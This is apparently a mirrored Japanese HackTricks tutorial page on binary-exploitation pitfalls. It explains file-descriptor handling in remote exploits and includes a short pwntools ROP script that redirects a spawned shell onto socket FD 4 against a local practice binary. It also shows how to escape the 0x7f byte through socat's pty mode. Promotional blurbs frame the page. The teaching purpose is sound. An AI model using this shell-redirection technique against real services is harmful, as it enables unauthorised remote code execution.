mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 00:20:59 +00:00
4.5 KiB
4.5 KiB
一般的な攻撃問題
htARTE(HackTricks AWS Red Team Expert) を通じて、ゼロからヒーローまでAWSハッキングを学ぶ!
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝してみたいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを発見し、独占的なNFTsコレクションをご覧ください
- 公式PEASS&HackTricksスウェグを手に入れましょう
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitterで私をフォローする🐦@carlospolopm。
- ハッキングテクニックを共有するために、PRを hacktricks repo と hacktricks-cloud repo に提出してください。
リモートエクスプロイテーションにおけるFDs
たとえば、リモートサーバーに**system('/bin/sh')
**を呼び出すエクスプロイトを送信すると、これはもちろんサーバープロセスで実行され、/bin/sh
はstdin(FD:0
)からの入力を期待し、stdoutおよびstderr(FDs 1
および2
)に出力を表示します。したがって、攻撃者はシェルと対話することができません。
これを修正する方法は、サーバーが起動したときにFD番号3
(リスニング用)を作成し、その後、接続が**FD番号4
**になると仮定することです。したがって、シェルに連絡を取ることが可能になります。
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
Socat & pty
socatは既に**stdin
とstdout
をソケットに転送しています。ただし、pty
モードにはDELETE文字が含まれています**。したがって、\x7f
(DELETE
-)を送信すると、エクスプロイトの前の文字が削除されます。
これをバイパスするには、\x7f
を送信する前にエスケープ文字\x16
を付加する必要があります。
ここではこの動作の例を見つけることができます。
htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ こちら!
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Family、当社の独占的なNFTsコレクションを発見
- 公式PEASS&HackTricksスウェグを手に入れる
- 💬Discordグループに参加するか、telegramグループに参加するか、Twitterで私をフォローする🐦@carlospolopm。
- ハッキングトリックを共有するために、hacktricksリポジトリ およびhacktricks-cloudリポジトリ にPRを提出してください。